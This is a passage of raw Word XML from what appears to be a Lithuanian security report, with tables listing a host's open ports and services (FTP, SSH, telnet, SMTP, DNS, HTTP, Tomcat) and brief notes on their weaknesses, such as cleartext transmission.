                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004558A7">
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>ajp13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1639" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="FFFFFF" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="246A493D" w14:textId="75B9A986" w:rsidR="004558A7" w:rsidRPr="004558A7" w:rsidRDefault="004558A7" w:rsidP="007C32E1">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004558A7">
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Apache Jserv (Protocol v1.3)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004558A7" w:rsidRPr="004558A7" w14:paraId="773E502C" w14:textId="77777777" w:rsidTr="004558A7">
        <w:trPr>
          <w:jc w:val="right"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1942" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="FFFFFF" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="36FD6363" w14:textId="4CDD20CD" w:rsidR="004558A7" w:rsidRPr="004558A7" w:rsidRDefault="004558A7" w:rsidP="007C32E1">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004558A7">
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>8180/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1419" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="FFFFFF" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="31DA9D84" w14:textId="351D2007" w:rsidR="004558A7" w:rsidRPr="004558A7" w:rsidRDefault="004558A7" w:rsidP="007C32E1">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004558A7">
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>http</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1639" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="FFFFFF" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="2AD98E8C" w14:textId="19388A63" w:rsidR="004558A7" w:rsidRPr="004558A7" w:rsidRDefault="004558A7" w:rsidP="007C32E1">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004558A7">
              <w:rPr>
                <w:rFonts w:eastAsia="MS Mincho"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Apache Tomcat/Coyote JSP engine 1.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0B0C49A0" w14:textId="7171343F" w:rsidR="0025697F" w:rsidRPr="00607DC0" w:rsidRDefault="0025697F" w:rsidP="00C84FB8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AF907C5" w14:textId="77777777" w:rsidR="004B1C5B" w:rsidRPr="00607DC0" w:rsidRDefault="004B1C5B" w:rsidP="00C84FB8">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:jc w:val="right"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1055"/>
        <w:gridCol w:w="1243"/>
        <w:gridCol w:w="3014"/>
        <w:gridCol w:w="4322"/>
      </w:tblGrid>
      <w:tr w:rsidR="004B1C5B" w:rsidRPr="00607DC0" w14:paraId="76AA26FF" w14:textId="77777777" w:rsidTr="00922004">
        <w:trPr>
          <w:jc w:val="right"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="548" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="FFFFFF" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="0EABCBD7"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Prievadas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="645" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="FFFFFF" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="6FB79E37"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Protokolas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1564" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="FFFFFF" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="723D9D23"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Paslauga</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2243" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="FFFFFF" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="40C23CFA" w14:textId="77777777" w:rsidR="004B1C5B" w:rsidRPr="00607DC0" w:rsidRDefault="004B1C5B"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Paslaugos detalės</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F0450F" w:rsidRPr="00607DC0" w14:paraId="7F291470" w14:textId="77777777" w:rsidTr="00922004">
        <w:trPr>
          <w:jc w:val="right"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="548" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="78A6FF37" w14:textId="6CE26FD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21/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="645" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3999E77A" w14:textId="45E9A1C9"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ftp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1564" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="60520EF5" w14:textId="28C4B38E" w:rsidR="00F0450F" w:rsidRPr="00607DC0" w:rsidRDefault="00452425"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File Transfer Protocol</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2243" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4714AC76" w14:textId="2C6BE41F" w:rsidR="00F0450F" w:rsidRPr="00607DC0" w:rsidRDefault="00452425" w:rsidP="00F0450F">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Slaptažodžiai ir failai siunčiami atviru tekstu</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F0450F" w:rsidRPr="00607DC0" w14:paraId="41B8DEBD" w14:textId="77777777" w:rsidTr="00922004">
        <w:trPr>
          <w:jc w:val="right"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="548" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="66020A44" w14:textId="2EF080A6"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22/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="645" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7750BD06" w14:textId="5B8437F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ssh</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1564" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6F7085B7" w14:textId="3E10B10B" w:rsidR="00F0450F" w:rsidRPr="00607DC0" w:rsidRDefault="00452425" w:rsidP="00F0450F">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00452425">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Secure shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2243" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4AC6A51B" w14:textId="77BC0021" w:rsidR="00F0450F" w:rsidRPr="00607DC0" w:rsidRDefault="00452425"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 Protokolas </w:t>
            </w:r>
            <w:r w:rsidRPr="00452425">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t xml:space="preserve">aprašantis apsaugotą kliento </w:t>
            </w:r>
            <w:r w:rsidRPr="00452425">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>prisijungimą prie</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t xml:space="preserve"> nutolusios</w:t>
            </w:r>
            <w:r w:rsidRPr="00452425">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t xml:space="preserve"> serverio aplinkos ir komandų vykdymą</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t xml:space="preserve"> serveryje</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F0450F" w:rsidRPr="00607DC0" w14:paraId="775B3878" w14:textId="77777777" w:rsidTr="00922004">
        <w:trPr>
          <w:jc w:val="right"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="548" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6C45E202" w14:textId="7A6412D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lastRenderedPageBreak/>
              <w:t>23/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="645" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4FFC4F67" w14:textId="6C34861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telnet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1564" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1D7EF2D2" w14:textId="5C9B0CA5" w:rsidR="00F0450F" w:rsidRPr="00607DC0" w:rsidRDefault="00452425" w:rsidP="00F0450F">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00452425">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Teletype Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2243" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2A3611F2" w14:textId="6FEF1D6B" w:rsidR="00F0450F" w:rsidRPr="00607DC0" w:rsidRDefault="00922004"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Naudojamas prisijungti prie nutolusio tinklo kompiuterio</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t xml:space="preserve"> arba serverio</w:t>
            </w:r>
            <w:r w:rsidRPr="001F6942">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>. Neturi nei perduodamų duomenų šifravimo, nei duomenų vientisumo tikrinimo.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F0450F" w:rsidRPr="00607DC0" w14:paraId="3ECC8D21" w14:textId="77777777" w:rsidTr="00922004">
        <w:trPr>
          <w:jc w:val="right"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="548" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="01923F58" w14:textId="36093072"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25/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="645" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6294CE3C" w14:textId="1994444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smtp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1564" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="01B8C7A4" w14:textId="207EBFF2" w:rsidR="00F0450F" w:rsidRPr="00607DC0" w:rsidRDefault="00922004" w:rsidP="00F0450F">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00922004">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Simple Mail Transfer Protocol</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2243" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="28CF967A" w14:textId="7A139A55" w:rsidR="00F0450F" w:rsidRPr="00607DC0" w:rsidRDefault="00922004" w:rsidP="00F0450F">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Pasplauga yra naudojama siūsti el. laiškus, dažnai šita paslauga yra naudojama masiniam laiškų siuntimui gavėjams.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F0450F" w:rsidRPr="00607DC0" w14:paraId="2DB5F83C" w14:textId="77777777" w:rsidTr="00922004">
        <w:trPr>
          <w:jc w:val="right"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="548" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="51F68388" w14:textId="680C40D7"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53/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="645" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7920D5B0" w14:textId="39206B45"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domain</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1564" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7BB2C69B" w14:textId="6E5EAECC" w:rsidR="00F0450F" w:rsidRPr="00607DC0" w:rsidRDefault="00922004" w:rsidP="00F0450F">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00922004">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Domain name</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t xml:space="preserve"> service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2243" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="147A2A50" w14:textId="654F2191" w:rsidR="00F0450F" w:rsidRPr="00607DC0" w:rsidRDefault="00922004" w:rsidP="00F0450F">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Vardų paslauga</w:t>
            </w:r>
            <w:r w:rsidR="00F045EB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t xml:space="preserve">. </w:t>
            </w:r>
            <w:r w:rsidR="00F045EB" w:rsidRPr="001F6942">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Egzistuoja trojos arklių, kurie naudojasi šio prievadu: ADM worm, li0n, MscanWorm, MuSka52, Trojan.Esteem.C ir kiti.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F0450F" w:rsidRPr="00607DC0" w14:paraId="2C845939" w14:textId="77777777" w:rsidTr="00922004">
        <w:trPr>
          <w:jc w:val="right"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="548" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="25686FB4" w14:textId="2BC016E0"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80/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="645" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="329222B6" w14:textId="033A5CEE"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http</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1564" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2B4A5D2F" w14:textId="2C1CBCC0" w:rsidR="00F0450F" w:rsidRPr="00607DC0" w:rsidRDefault="00F045EB"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World Wide Web HTTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2243" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5EE5AF56" w14:textId="5520FAA9" w:rsidR="00F0450F" w:rsidRPr="00607DC0" w:rsidRDefault="006A279C" w:rsidP="00F0450F">
            <w:pPr>
              <w:pStyle w:val="BodyText"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Protokolas yra skirtas komunikuoti tarp naršyklės ir puslapio serverio, atviru tekstu.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F0450F" w:rsidRPr="00607DC0" w14:paraId="269D6A3B" w14:textId="77777777" w:rsidTr="00922004">
        <w:trPr>
          <w:jc w:val="right"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="548" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3DD5EC8B" w14:textId="710BC9D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111/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="645" w:type="pct"/>
            <w:tcBorders>
